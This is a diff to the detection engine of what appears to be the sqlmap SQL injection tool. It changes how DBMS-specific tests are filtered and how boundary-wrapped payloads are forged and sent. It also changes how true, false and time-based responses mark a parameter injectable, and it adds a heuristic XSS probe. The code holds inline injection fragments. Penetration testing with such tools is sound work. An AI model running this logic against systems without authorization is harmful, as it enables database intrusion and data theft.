msg = "heuristic (parsing) test showed that the "
|
# payload), ask the user to limit the tests to the fingerprinted
|
||||||
msg += "back-end DBMS could be '%s'. " % (Format.getErrorParsedDBMSes() if Backend.getErrorParsedDBMSes() else kb.heuristicDbms)
|
# DBMS
|
||||||
|
if kb.reduceTests is None and not conf.testFilter and (intersect(Backend.getErrorParsedDBMSes(), \
|
||||||
|
SUPPORTED_DBMS, True) or kb.heuristicDbms or injection.dbms):
|
||||||
|
msg = "it looks like the back-end DBMS is '%s'. " % (Format.getErrorParsedDBMSes() or kb.heuristicDbms or injection.dbms)
|
||||||
msg += "Do you want to skip test payloads specific for other DBMSes? [Y/n]"
|
msg += "Do you want to skip test payloads specific for other DBMSes? [Y/n]"
|
||||||
kb.reduceTests = [] if readInput(msg, default='Y').upper() != 'Y' else (Backend.getErrorParsedDBMSes() or [kb.heuristicDbms])
|
kb.reduceTests = (Backend.getErrorParsedDBMSes() or [kb.heuristicDbms]) if readInput(msg, default='Y').upper() == 'Y' else []
|
||||||
|
|
||||||
if kb.extendTests is None:
|
# If the DBMS has been fingerprinted (via DBMS-specific error
|
||||||
_ = (Format.getErrorParsedDBMSes() if Backend.getErrorParsedDBMSes() else kb.heuristicDbms)
|
# message, via simple heuristic check or via DBMS-specific
|
||||||
msg = "do you want to include all tests for '%s' " % _
|
# payload), ask the user to extend the tests to all DBMS-specific,
|
||||||
msg += "extending provided level (%d) and risk (%s)? [Y/n]" % (conf.level, conf.risk)
|
# regardless of --level and --risk values provided
|
||||||
kb.extendTests = [] if readInput(msg, default='Y').upper() != 'Y' else (Backend.getErrorParsedDBMSes() or [kb.heuristicDbms])
|
if kb.extendTests is None and not conf.testFilter and (conf.level < 5 or conf.risk < 3) \
|
||||||
|
and (intersect(Backend.getErrorParsedDBMSes(), SUPPORTED_DBMS, True) or \
|
||||||
|
kb.heuristicDbms or injection.dbms):
|
||||||
|
msg = "for the remaining tests, do you want to include all tests "
|
||||||
|
msg += "for '%s' extending provided " % (Format.getErrorParsedDBMSes() or kb.heuristicDbms or injection.dbms)
|
||||||
|
msg += "level (%d)" % conf.level if conf.level < 5 else ""
|
||||||
|
msg += " and " if conf.level < 5 and conf.risk < 3 else ""
|
||||||
|
msg += "risk (%d)" % conf.risk if conf.risk < 3 else ""
|
||||||
|
msg += " values? [Y/n]" if conf.level < 5 and conf.risk < 3 else " value? [Y/n]"
|
||||||
|
kb.extendTests = (Backend.getErrorParsedDBMSes() or [kb.heuristicDbms]) if readInput(msg, default='Y').upper() == 'Y' else []
|
||||||
|
|
||||||
title = test.title
|
title = test.title
|
||||||
stype = test.stype
|
kb.testType = stype = test.stype
|
||||||
clause = test.clause
|
clause = test.clause
|
||||||
unionExtended = False
|
unionExtended = False
|
||||||
|
|
||||||
|
@ -165,27 +188,56 @@ def checkSqlInjection(place, parameter, value):
|
||||||
logger.debug(debugMsg)
|
logger.debug(debugMsg)
|
||||||
continue
|
continue
|
||||||
|
|
||||||
|
# Parse DBMS-specific payloads' details
|
||||||
# Skip DBMS-specific test if it does not match either the
|
|
||||||
# previously identified or the user's provided DBMS (either
|
|
||||||
# from program switch or from parsed error message(s))
|
|
||||||
if "details" in test and "dbms" in test.details:
|
if "details" in test and "dbms" in test.details:
|
||||||
dbms = test.details.dbms
|
payloadDbms = test.details.dbms
|
||||||
else:
|
else:
|
||||||
dbms = None
|
payloadDbms = None
|
||||||
|
|
||||||
# Skip tests if title is not included by the given filter
|
# Skip tests if title, vector or DBMS is not included by the
|
||||||
if conf.testFilter:
|
# given test filter
|
||||||
if not any(conf.testFilter in str(item) or re.search(conf.testFilter, str(item), re.I) for item in (test.title, test.vector, dbms)):
|
if conf.testFilter and not any(conf.testFilter in str(item) or \
|
||||||
debugMsg = "skipping test '%s' because " % title
|
re.search(conf.testFilter, str(item), re.I) for item in \
|
||||||
debugMsg += "its name/vector/dbms is not included by the given filter"
|
(test.title, test.vector, payloadDbms)):
|
||||||
|
debugMsg = "skipping test '%s' because its " % title
|
||||||
|
debugMsg += "name/vector/DBMS is not included by the given filter"
|
||||||
logger.debug(debugMsg)
|
logger.debug(debugMsg)
|
||||||
continue
|
continue
|
||||||
|
|
||||||
elif not (kb.extendTests and intersect(dbms, kb.extendTests)):
|
if payloadDbms is not None:
|
||||||
|
# Skip DBMS-specific test if it does not match the user's
|
||||||
|
# provided DBMS
|
||||||
|
if conf.dbms is not None and not intersect(payloadDbms, conf.dbms, True):
|
||||||
|
debugMsg = "skipping test '%s' because " % title
|
||||||
|
debugMsg += "the provided DBMS is %s" % conf.dbms
|
||||||
|
logger.debug(debugMsg)
|
||||||
|
continue
|
||||||
|
|
||||||
|
# Skip DBMS-specific test if it does not match the
|
||||||
|
# previously identified DBMS (via DBMS-specific payload)
|
||||||
|
if injection.dbms is not None and not intersect(payloadDbms, injection.dbms, True):
|
||||||
|
debugMsg = "skipping test '%s' because the identified " % title
|
||||||
|
debugMsg += "back-end DBMS is %s" % injection.dbms
|
||||||
|
logger.debug(debugMsg)
|
||||||
|
continue
|
||||||
|
|
||||||
|
# Skip DBMS-specific test if it does not match the
|
||||||
|
# previously identified DBMS (via DBMS-specific error message)
|
||||||
|
if kb.reduceTests and not intersect(payloadDbms, kb.reduceTests, True):
|
||||||
|
debugMsg = "skipping test '%s' because the parsed " % title
|
||||||
|
debugMsg += "error message(s) showed that the back-end DBMS "
|
||||||
|
debugMsg += "could be %s" % Format.getErrorParsedDBMSes()
|
||||||
|
logger.debug(debugMsg)
|
||||||
|
continue
|
||||||
|
|
||||||
|
# If the user did not decide to extend the tests to all
|
||||||
|
# DBMS-specific or the test payloads is not specific to the
|
||||||
|
# identified DBMS, then only test for it if both level and risk
|
||||||
|
# are below the corrisponding configuration's level and risk
|
||||||
|
# values
|
||||||
|
if not conf.testFilter and not (kb.extendTests and intersect(payloadDbms, kb.extendTests, True)):
|
||||||
# Skip test if the risk is higher than the provided (or default)
|
# Skip test if the risk is higher than the provided (or default)
|
||||||
# value
|
# value
|
||||||
# Parse test's <risk>
|
|
||||||
if test.risk > conf.risk:
|
if test.risk > conf.risk:
|
||||||
debugMsg = "skipping test '%s' because the risk (%d) " % (title, test.risk)
|
debugMsg = "skipping test '%s' because the risk (%d) " % (title, test.risk)
|
||||||
debugMsg += "is higher than the provided (%d)" % conf.risk
|
debugMsg += "is higher than the provided (%d)" % conf.risk
|
||||||
|
@ -194,35 +246,12 @@ def checkSqlInjection(place, parameter, value):
|
||||||
|
|
||||||
# Skip test if the level is higher than the provided (or default)
|
# Skip test if the level is higher than the provided (or default)
|
||||||
# value
|
# value
|
||||||
# Parse test's <level>
|
|
||||||
if test.level > conf.level:
|
if test.level > conf.level:
|
||||||
debugMsg = "skipping test '%s' because the level (%d) " % (title, test.level)
|
debugMsg = "skipping test '%s' because the level (%d) " % (title, test.level)
|
||||||
debugMsg += "is higher than the provided (%d)" % conf.level
|
debugMsg += "is higher than the provided (%d)" % conf.level
|
||||||
logger.debug(debugMsg)
|
logger.debug(debugMsg)
|
||||||
continue
|
continue
|
||||||
|
|
||||||
if dbms is not None:
|
|
||||||
if injection.dbms is not None and not intersect(injection.dbms, dbms):
|
|
||||||
debugMsg = "skipping test '%s' because " % title
|
|
||||||
debugMsg += "the back-end DBMS identified is "
|
|
||||||
debugMsg += "%s" % injection.dbms
|
|
||||||
logger.debug(debugMsg)
|
|
||||||
continue
|
|
||||||
|
|
||||||
if conf.dbms is not None and not intersect(conf.dbms.lower(), [_.lower() for _ in arrayizeValue(dbms)]):
|
|
||||||
debugMsg = "skipping test '%s' because " % title
|
|
||||||
debugMsg += "the provided DBMS is %s" % conf.dbms
|
|
||||||
logger.debug(debugMsg)
|
|
||||||
continue
|
|
||||||
|
|
||||||
if kb.reduceTests and not intersect(dbms, kb.reduceTests):
|
|
||||||
debugMsg = "skipping test '%s' because " % title
|
|
||||||
debugMsg += "the parsed error message(s) showed "
|
|
||||||
debugMsg += "that the back-end DBMS could be "
|
|
||||||
debugMsg += "%s" % Format.getErrorParsedDBMSes()
|
|
||||||
logger.debug(debugMsg)
|
|
||||||
continue
|
|
||||||
|
|
||||||
# Skip test if it does not match the same SQL injection clause
|
# Skip test if it does not match the same SQL injection clause
|
||||||
# already identified by another test
|
# already identified by another test
|
||||||
clauseMatch = False
|
clauseMatch = False
|
||||||
|
@ -234,11 +263,11 @@ def checkSqlInjection(place, parameter, value):
|
||||||
|
|
||||||
if clause != [0] and injection.clause and injection.clause != [0] and not clauseMatch:
|
if clause != [0] and injection.clause and injection.clause != [0] and not clauseMatch:
|
||||||
debugMsg = "skipping test '%s' because the clauses " % title
|
debugMsg = "skipping test '%s' because the clauses " % title
|
||||||
debugMsg += "differs from the clause already identified"
|
debugMsg += "differ from the clause already identified"
|
||||||
logger.debug(debugMsg)
|
logger.debug(debugMsg)
|
||||||
continue
|
continue
|
||||||
|
|
||||||
# Skip test if the user provided custom character
|
# Skip test if the user provided custom character (for UNION-based payloads)
|
||||||
if conf.uChar is not None and ("random number" in title or "(NULL)" in title):
|
if conf.uChar is not None and ("random number" in title or "(NULL)" in title):
|
||||||
debugMsg = "skipping test '%s' because the user " % title
|
debugMsg = "skipping test '%s' because the user " % title
|
||||||
debugMsg += "provided a specific character, %s" % conf.uChar
|
debugMsg += "provided a specific character, %s" % conf.uChar
|
||||||
|
@ -248,9 +277,9 @@ def checkSqlInjection(place, parameter, value):
|
||||||
infoMsg = "testing '%s'" % title
|
infoMsg = "testing '%s'" % title
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
# Force back-end DBMS according to the current
|
# Force back-end DBMS according to the current test DBMS value
|
||||||
# test value for proper payload unescaping
|
# for proper payload unescaping
|
||||||
Backend.forceDbms(dbms[0] if isinstance(dbms, list) else dbms)
|
Backend.forceDbms(payloadDbms[0] if isinstance(payloadDbms, list) else payloadDbms)
|
||||||
|
|
||||||
# Parse test's <request>
|
# Parse test's <request>
|
||||||
comment = agent.getComment(test.request) if len(conf.boundaries) > 1 else None
|
comment = agent.getComment(test.request) if len(conf.boundaries) > 1 else None
|
||||||
|
@ -268,7 +297,7 @@ def checkSqlInjection(place, parameter, value):
|
||||||
# Skip boundary if the level is higher than the provided (or
|
# Skip boundary if the level is higher than the provided (or
|
||||||
# default) value
|
# default) value
|
||||||
# Parse boundary's <level>
|
# Parse boundary's <level>
|
||||||
if boundary.level > conf.level:
|
if boundary.level > conf.level and not (kb.extendTests and intersect(payloadDbms, kb.extendTests, True)):
|
||||||
continue
|
continue
|
||||||
|
|
||||||
# Skip boundary if it does not match against test's <clause>
|
# Skip boundary if it does not match against test's <clause>
|
||||||
|
@ -298,14 +327,13 @@ def checkSqlInjection(place, parameter, value):
|
||||||
# Parse boundary's <prefix>, <suffix> and <ptype>
|
# Parse boundary's <prefix>, <suffix> and <ptype>
|
||||||
prefix = boundary.prefix if boundary.prefix else ""
|
prefix = boundary.prefix if boundary.prefix else ""
|
||||||
suffix = boundary.suffix if boundary.suffix else ""
|
suffix = boundary.suffix if boundary.suffix else ""
|
||||||
|
ptype = boundary.ptype
|
||||||
|
|
||||||
# Options --prefix/--suffix have a higher priority (if set by user)
|
# Options --prefix/--suffix have a higher priority (if set by user)
|
||||||
prefix = conf.prefix if conf.prefix is not None else prefix
|
prefix = conf.prefix if conf.prefix is not None else prefix
|
||||||
suffix = conf.suffix if conf.suffix is not None else suffix
|
suffix = conf.suffix if conf.suffix is not None else suffix
|
||||||
comment = None if conf.suffix is not None else comment
|
comment = None if conf.suffix is not None else comment
|
||||||
|
|
||||||
ptype = boundary.ptype
|
|
||||||
|
|
||||||
# If the previous injections succeeded, we know which prefix,
|
# If the previous injections succeeded, we know which prefix,
|
||||||
# suffix and parameter type to use for further tests, no
|
# suffix and parameter type to use for further tests, no
|
||||||
# need to cycle through the boundaries for the following tests
|
# need to cycle through the boundaries for the following tests
|
||||||
|
@ -313,7 +341,9 @@ def checkSqlInjection(place, parameter, value):
|
||||||
condBound &= (injection.prefix != prefix or injection.suffix != suffix)
|
condBound &= (injection.prefix != prefix or injection.suffix != suffix)
|
||||||
condType = injection.ptype is not None and injection.ptype != ptype
|
condType = injection.ptype is not None and injection.ptype != ptype
|
||||||
|
|
||||||
if condBound or condType:
|
# If the payload is an inline query test for it regardless
|
||||||
|
# of previously identified injection types
|
||||||
|
if stype != PAYLOAD.TECHNIQUE.QUERY and (condBound or condType):
|
||||||
continue
|
continue
|
||||||
|
|
||||||
# For each test's <where>
|
# For each test's <where>
|
||||||
|
@ -334,6 +364,7 @@ def checkSqlInjection(place, parameter, value):
|
||||||
# will likely result in a different content
|
# will likely result in a different content
|
||||||
kb.data.setdefault("randomInt", str(randomInt(10)))
|
kb.data.setdefault("randomInt", str(randomInt(10)))
|
||||||
kb.data.setdefault("randomStr", str(randomStr(10)))
|
kb.data.setdefault("randomStr", str(randomStr(10)))
|
||||||
|
|
||||||
if conf.invalidLogical:
|
if conf.invalidLogical:
|
||||||
_ = int(kb.data.randomInt[:2])
|
_ = int(kb.data.randomInt[:2])
|
||||||
origValue = "%s AND %s=%s" % (value, _, _ + 1)
|
origValue = "%s AND %s=%s" % (value, _, _ + 1)
|
||||||
|
@ -343,6 +374,7 @@ def checkSqlInjection(place, parameter, value):
|
||||||
origValue = kb.data.randomStr[:6]
|
origValue = kb.data.randomStr[:6]
|
||||||
else:
|
else:
|
||||||
origValue = "-%s" % kb.data.randomInt[:4]
|
origValue = "-%s" % kb.data.randomInt[:4]
|
||||||
|
|
||||||
templatePayload = agent.payload(place, parameter, value="", newValue=origValue, where=where)
|
templatePayload = agent.payload(place, parameter, value="", newValue=origValue, where=where)
|
||||||
elif where == PAYLOAD.WHERE.REPLACE:
|
elif where == PAYLOAD.WHERE.REPLACE:
|
||||||
origValue = ""
|
origValue = ""
|
||||||
|
@ -352,9 +384,17 @@ def checkSqlInjection(place, parameter, value):
|
||||||
# Forge request payload by prepending with boundary's
|
# Forge request payload by prepending with boundary's
|
||||||
# prefix and appending the boundary's suffix to the
|
# prefix and appending the boundary's suffix to the
|
||||||
# test's ' <payload><comment> ' string
|
# test's ' <payload><comment> ' string
|
||||||
|
if fstPayload:
|
||||||
boundPayload = agent.prefixQuery(fstPayload, prefix, where, clause)
|
boundPayload = agent.prefixQuery(fstPayload, prefix, where, clause)
|
||||||
boundPayload = agent.suffixQuery(boundPayload, comment, suffix, where)
|
boundPayload = agent.suffixQuery(boundPayload, comment, suffix, where)
|
||||||
reqPayload = agent.payload(place, parameter, newValue=boundPayload, where=where)
|
reqPayload = agent.payload(place, parameter, newValue=boundPayload, where=where)
|
||||||
|
if reqPayload:
|
||||||
|
if reqPayload in seenPayload:
|
||||||
|
continue
|
||||||
|
else:
|
||||||
|
seenPayload.add(reqPayload)
|
||||||
|
else:
|
||||||
|
reqPayload = None
|
||||||
|
|
||||||
# Perform the test's request and check whether or not the
|
# Perform the test's request and check whether or not the
|
||||||
# payload was successful
|
# payload was successful
|
||||||
|
@ -389,12 +429,12 @@ def checkSqlInjection(place, parameter, value):
|
||||||
trueResult = Request.queryPage(reqPayload, place, raise404=False)
|
trueResult = Request.queryPage(reqPayload, place, raise404=False)
|
||||||
truePage = threadData.lastComparisonPage or ""
|
truePage = threadData.lastComparisonPage or ""
|
||||||
|
|
||||||
if trueResult:
|
if trueResult and not(truePage == falsePage and not kb.nullConnection):
|
||||||
falseResult = Request.queryPage(genCmpPayload(), place, raise404=False)
|
falseResult = Request.queryPage(genCmpPayload(), place, raise404=False)
|
||||||
|
|
||||||
# Perform the test's False request
|
# Perform the test's False request
|
||||||
if not falseResult:
|
if not falseResult:
|
||||||
infoMsg = "%s parameter '%s' seems to be '%s' injectable " % (place, parameter, title)
|
infoMsg = "%s parameter '%s' seems to be '%s' injectable " % (paramType, parameter, title)
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
injectable = True
|
injectable = True
|
||||||
|
@ -403,9 +443,10 @@ def checkSqlInjection(place, parameter, value):
|
||||||
trueSet = set(extractTextTagContent(truePage))
|
trueSet = set(extractTextTagContent(truePage))
|
||||||
falseSet = set(extractTextTagContent(falsePage))
|
falseSet = set(extractTextTagContent(falsePage))
|
||||||
candidates = filter(None, (_.strip() if _.strip() in (kb.pageTemplate or "") and _.strip() not in falsePage and _.strip() not in threadData.lastComparisonHeaders else None for _ in (trueSet - falseSet)))
|
candidates = filter(None, (_.strip() if _.strip() in (kb.pageTemplate or "") and _.strip() not in falsePage and _.strip() not in threadData.lastComparisonHeaders else None for _ in (trueSet - falseSet)))
|
||||||
|
|
||||||
if candidates:
|
if candidates:
|
||||||
conf.string = candidates[0]
|
conf.string = candidates[0]
|
||||||
infoMsg = "%s parameter '%s' seems to be '%s' injectable (with --string=\"%s\")" % (place, parameter, title, repr(conf.string).lstrip('u').strip("'"))
|
infoMsg = "%s parameter '%s' seems to be '%s' injectable (with --string=\"%s\")" % (paramType, parameter, title, repr(conf.string).lstrip('u').strip("'"))
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
injectable = True
|
injectable = True
|
||||||
|
@ -428,7 +469,7 @@ def checkSqlInjection(place, parameter, value):
|
||||||
result = output == "1"
|
result = output == "1"
|
||||||
|
|
||||||
if result:
|
if result:
|
||||||
infoMsg = "%s parameter '%s' is '%s' injectable " % (place, parameter, title)
|
infoMsg = "%s parameter '%s' is '%s' injectable " % (paramType, parameter, title)
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
injectable = True
|
injectable = True
|
||||||
|
@ -450,7 +491,7 @@ def checkSqlInjection(place, parameter, value):
|
||||||
trueResult = Request.queryPage(reqPayload, place, timeBasedCompare=True, raise404=False)
|
trueResult = Request.queryPage(reqPayload, place, timeBasedCompare=True, raise404=False)
|
||||||
|
|
||||||
if trueResult:
|
if trueResult:
|
||||||
infoMsg = "%s parameter '%s' seems to be '%s' injectable " % (place, parameter, title)
|
infoMsg = "%s parameter '%s' seems to be '%s' injectable " % (paramType, parameter, title)
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
injectable = True
|
injectable = True
|
||||||
|
@ -466,7 +507,7 @@ def checkSqlInjection(place, parameter, value):
|
||||||
configUnion(test.request.char, test.request.columns)
|
configUnion(test.request.char, test.request.columns)
|
||||||
|
|
||||||
if not Backend.getIdentifiedDbms():
|
if not Backend.getIdentifiedDbms():
|
||||||
if kb.heuristicDbms in (None, UNKNOWN_DBMS):
|
if kb.heuristicDbms is None:
|
||||||
warnMsg = "using unescaped version of the test "
|
warnMsg = "using unescaped version of the test "
|
||||||
warnMsg += "because of zero knowledge of the "
|
warnMsg += "because of zero knowledge of the "
|
||||||
warnMsg += "back-end DBMS. You can try to "
|
warnMsg += "back-end DBMS. You can try to "
|
||||||
|
@ -476,17 +517,28 @@ def checkSqlInjection(place, parameter, value):
|
||||||
Backend.forceDbms(kb.heuristicDbms)
|
Backend.forceDbms(kb.heuristicDbms)
|
||||||
|
|
||||||
if unionExtended:
|
if unionExtended:
|
||||||
infoMsg = "automatically extending ranges "
|
infoMsg = "automatically extending ranges for UNION "
|
||||||
infoMsg += "for UNION query injection technique tests as "
|
infoMsg += "query injection technique tests as "
|
||||||
infoMsg += "there is at least one other (potential) "
|
infoMsg += "there is at least one other (potential) "
|
||||||
infoMsg += "technique found"
|
infoMsg += "technique found"
|
||||||
singleTimeLogMessage(infoMsg)
|
singleTimeLogMessage(infoMsg)
|
||||||
|
elif not injection.data:
|
||||||
|
_ = test.request.columns.split('-')[-1]
|
||||||
|
if _.isdigit() and int(_) > 10:
|
||||||
|
if kb.futileUnion is None:
|
||||||
|
msg = "it is not recommended to perform "
|
||||||
|
msg += "extended UNION tests if there is not "
|
||||||
|
msg += "at least one other (potential) "
|
||||||
|
msg += "technique found. Do you want to skip? [Y/n] "
|
||||||
|
kb.futileUnion = readInput(msg, default="Y").strip().upper() == 'N'
|
||||||
|
if kb.futileUnion is False:
|
||||||
|
continue
|
||||||
|
|
||||||
# Test for UNION query SQL injection
|
# Test for UNION query SQL injection
|
||||||
reqPayload, vector = unionTest(comment, place, parameter, value, prefix, suffix)
|
reqPayload, vector = unionTest(comment, place, parameter, value, prefix, suffix)
|
||||||
|
|
||||||
if isinstance(reqPayload, basestring):
|
if isinstance(reqPayload, basestring):
|
||||||
infoMsg = "%s parameter '%s' is '%s' injectable" % (place, parameter, title)
|
infoMsg = "%s parameter '%s' is '%s' injectable" % (paramType, parameter, title)
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
injectable = True
|
injectable = True
|
||||||
|
@ -497,7 +549,7 @@ def checkSqlInjection(place, parameter, value):
|
||||||
|
|
||||||
kb.previousMethod = method
|
kb.previousMethod = method
|
||||||
|
|
||||||
if conf.dummy:
|
if conf.dummy or conf.offline:
|
||||||
injectable = False
|
injectable = False
|
||||||
|
|
||||||
# If the injection test was successful feed the injection
|
# If the injection test was successful feed the injection
|
||||||
|
@ -522,12 +574,15 @@ def checkSqlInjection(place, parameter, value):
|
||||||
for dKey, dValue in test.details.items():
|
for dKey, dValue in test.details.items():
|
||||||
if dKey == "dbms":
|
if dKey == "dbms":
|
||||||
injection.dbms = dValue
|
injection.dbms = dValue
|
||||||
|
|
||||||
if not isinstance(dValue, list):
|
if not isinstance(dValue, list):
|
||||||
Backend.setDbms(dValue)
|
Backend.setDbms(dValue)
|
||||||
else:
|
else:
|
||||||
Backend.forceDbms(dValue[0], True)
|
Backend.forceDbms(dValue[0], True)
|
||||||
|
|
||||||
elif dKey == "dbms_version" and injection.dbms_version is None and not conf.testFilter:
|
elif dKey == "dbms_version" and injection.dbms_version is None and not conf.testFilter:
|
||||||
injection.dbms_version = Backend.setVersion(dValue)
|
injection.dbms_version = Backend.setVersion(dValue)
|
||||||
|
|
||||||
elif dKey == "os" and injection.os is None:
|
elif dKey == "os" and injection.os is None:
|
||||||
injection.os = Backend.setOs(dValue)
|
injection.os = Backend.setOs(dValue)
|
||||||
|
|
||||||
|
@ -592,6 +647,7 @@ def checkSqlInjection(place, parameter, value):
|
||||||
choice = readInput(msg, default=str(conf.verbose), checkBatch=False).strip()
|
choice = readInput(msg, default=str(conf.verbose), checkBatch=False).strip()
|
||||||
conf.verbose = int(choice)
|
conf.verbose = int(choice)
|
||||||
setVerbosity()
|
setVerbosity()
|
||||||
|
tests.insert(0, test)
|
||||||
elif choice[0] in ("n", "N"):
|
elif choice[0] in ("n", "N"):
|
||||||
return None
|
return None
|
||||||
elif choice[0] in ("e", "E"):
|
elif choice[0] in ("e", "E"):
|
||||||
|
@ -627,13 +683,22 @@ def checkSqlInjection(place, parameter, value):
|
||||||
return injection
|
return injection
|
||||||
|
|
||||||
def heuristicCheckDbms(injection):
|
def heuristicCheckDbms(injection):
|
||||||
retVal = None
|
"""
|
||||||
|
This functions is called when boolean-based blind is identified with a
|
||||||
|
generic payload and the DBMS has not yet been fingerprinted to attempt
|
||||||
|
to identify with a simple DBMS specific boolean-based test what the DBMS
|
||||||
|
may be
|
||||||
|
"""
|
||||||
|
retVal = False
|
||||||
|
|
||||||
pushValue(kb.injection)
|
pushValue(kb.injection)
|
||||||
kb.injection = injection
|
kb.injection = injection
|
||||||
randStr1, randStr2 = randomStr(), randomStr()
|
|
||||||
|
|
||||||
for dbms in getPublicTypeMembers(DBMS, True):
|
for dbms in getPublicTypeMembers(DBMS, True):
|
||||||
|
if not FROM_DUMMY_TABLE.get(dbms, ""):
|
||||||
|
continue
|
||||||
|
|
||||||
|
randStr1, randStr2 = randomStr(), randomStr()
|
||||||
Backend.forceDbms(dbms)
|
Backend.forceDbms(dbms)
|
||||||
|
|
||||||
if checkBooleanExpression("(SELECT '%s'%s)='%s'" % (randStr1, FROM_DUMMY_TABLE.get(dbms, ""), randStr1)):
|
if checkBooleanExpression("(SELECT '%s'%s)='%s'" % (randStr1, FROM_DUMMY_TABLE.get(dbms, ""), randStr1)):
|
||||||
|
@ -645,7 +710,7 @@ def heuristicCheckDbms(injection):
|
||||||
kb.injection = popValue()
|
kb.injection = popValue()
|
||||||
|
|
||||||
if retVal:
|
if retVal:
|
||||||
infoMsg = "heuristic (extended) test shows that the back-end DBMS " # not as important as "parsing" counter-part (because of false-positives)
|
infoMsg = "heuristic (extended) test shows that the back-end DBMS " # Not as important as "parsing" counter-part (because of false-positives)
|
||||||
infoMsg += "could be '%s' " % retVal
|
infoMsg += "could be '%s' " % retVal
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
|
@ -658,7 +723,8 @@ def checkFalsePositives(injection):
|
||||||
|
|
||||||
retVal = injection
|
retVal = injection
|
||||||
|
|
||||||
if all(_ in (PAYLOAD.TECHNIQUE.BOOLEAN, PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED) for _ in injection.data):
|
if all(_ in (PAYLOAD.TECHNIQUE.BOOLEAN, PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED) for _ in injection.data) or\
|
||||||
|
(len(injection.data) == 1 and PAYLOAD.TECHNIQUE.UNION in injection.data and "Generic" in injection.data[PAYLOAD.TECHNIQUE.UNION].title):
|
||||||
pushValue(kb.injection)
|
pushValue(kb.injection)
|
||||||
|
|
||||||
infoMsg = "checking if the injection point on %s " % injection.place
|
infoMsg = "checking if the injection point on %s " % injection.place
|
||||||
|
@ -671,16 +737,14 @@ def checkFalsePositives(injection):
|
||||||
kb.injection = injection
|
kb.injection = injection
|
||||||
|
|
||||||
for i in xrange(conf.level):
|
for i in xrange(conf.level):
|
||||||
|
while True:
|
||||||
randInt1, randInt2, randInt3 = (_() for j in xrange(3))
|
randInt1, randInt2, randInt3 = (_() for j in xrange(3))
|
||||||
|
|
||||||
randInt1 = min(randInt1, randInt2, randInt3)
|
randInt1 = min(randInt1, randInt2, randInt3)
|
||||||
randInt3 = max(randInt1, randInt2, randInt3)
|
randInt3 = max(randInt1, randInt2, randInt3)
|
||||||
|
|
||||||
while randInt1 >= randInt2:
|
if randInt3 > randInt2 > randInt1:
|
||||||
randInt2 = _()
|
break
|
||||||
|
|
||||||
while randInt2 >= randInt3:
|
|
||||||
randInt3 = _()
|
|
||||||
|
|
||||||
if not checkBooleanExpression("%d=%d" % (randInt1, randInt1)):
|
if not checkBooleanExpression("%d=%d" % (randInt1, randInt1)):
|
||||||
retVal = None
|
retVal = None
|
||||||
|
@ -763,20 +827,12 @@ def checkFilteredChars(injection):
|
||||||
|
|
||||||
def heuristicCheckSqlInjection(place, parameter):
|
def heuristicCheckSqlInjection(place, parameter):
|
||||||
if kb.nullConnection:
|
if kb.nullConnection:
|
||||||
debugMsg = "heuristic check skipped "
|
debugMsg = "heuristic check skipped because NULL connection used"
|
||||||
debugMsg += "because NULL connection used"
|
|
||||||
logger.debug(debugMsg)
|
|
||||||
return None
|
|
||||||
|
|
||||||
if wasLastResponseDBMSError():
|
|
||||||
debugMsg = "heuristic check skipped "
|
|
||||||
debugMsg += "because original page content "
|
|
||||||
debugMsg += "contains DBMS error"
|
|
||||||
logger.debug(debugMsg)
|
logger.debug(debugMsg)
|
||||||
return None
|
return None
|
||||||
|
|
||||||
origValue = conf.paramDict[place][parameter]
|
origValue = conf.paramDict[place][parameter]
|
||||||
|
paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place
|
||||||
prefix = ""
|
prefix = ""
|
||||||
suffix = ""
|
suffix = ""
|
||||||
|
|
||||||
|
@ -788,6 +844,7 @@ def heuristicCheckSqlInjection(place, parameter):
|
||||||
suffix = conf.suffix
|
suffix = conf.suffix
|
||||||
|
|
||||||
randStr = ""
|
randStr = ""
|
||||||
|
|
||||||
while '\'' not in randStr:
|
while '\'' not in randStr:
|
||||||
randStr = randomStr(length=10, alphabet=HEURISTIC_CHECK_ALPHABET)
|
randStr = randomStr(length=10, alphabet=HEURISTIC_CHECK_ALPHABET)
|
||||||
|
|
||||||
|
@ -802,8 +859,8 @@ def heuristicCheckSqlInjection(place, parameter):
|
||||||
parseFilePaths(page)
|
parseFilePaths(page)
|
||||||
result = wasLastResponseDBMSError()
|
result = wasLastResponseDBMSError()
|
||||||
|
|
||||||
infoMsg = "heuristic (basic) test shows that %s " % place
|
infoMsg = "heuristic (basic) test shows that %s parameter " % paramType
|
||||||
infoMsg += "parameter '%s' might " % parameter
|
infoMsg += "'%s' might " % parameter
|
||||||
|
|
||||||
def _(page):
|
def _(page):
|
||||||
return any(_ in (page or "") for _ in FORMAT_EXCEPTION_STRINGS)
|
return any(_ in (page or "") for _ in FORMAT_EXCEPTION_STRINGS)
|
||||||
|
@ -844,6 +901,22 @@ def heuristicCheckSqlInjection(place, parameter):
|
||||||
infoMsg += "not be injectable"
|
infoMsg += "not be injectable"
|
||||||
logger.warn(infoMsg)
|
logger.warn(infoMsg)
|
||||||
|
|
||||||
|
kb.heuristicMode = True
|
||||||
|
|
||||||
|
value = "%s%s%s" % (randomStr(), DUMMY_XSS_CHECK_APPENDIX, randomStr())
|
||||||
|
payload = "%s%s%s" % (prefix, "'%s" % value, suffix)
|
||||||
|
payload = agent.payload(place, parameter, newValue=payload)
|
||||||
|
page, _ = Request.queryPage(payload, place, content=True, raise404=False)
|
||||||
|
|
||||||
|
paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place
|
||||||
|
|
||||||
|
if value in (page or ""):
|
||||||
|
infoMsg = "heuristic (XSS) test shows that %s parameter " % paramType
|
||||||
|
infoMsg += "'%s' might be vulnerable to XSS attacks" % parameter
|
||||||
|
logger.info(infoMsg)
|
||||||
|
|
||||||
|
kb.heuristicMode = False
|
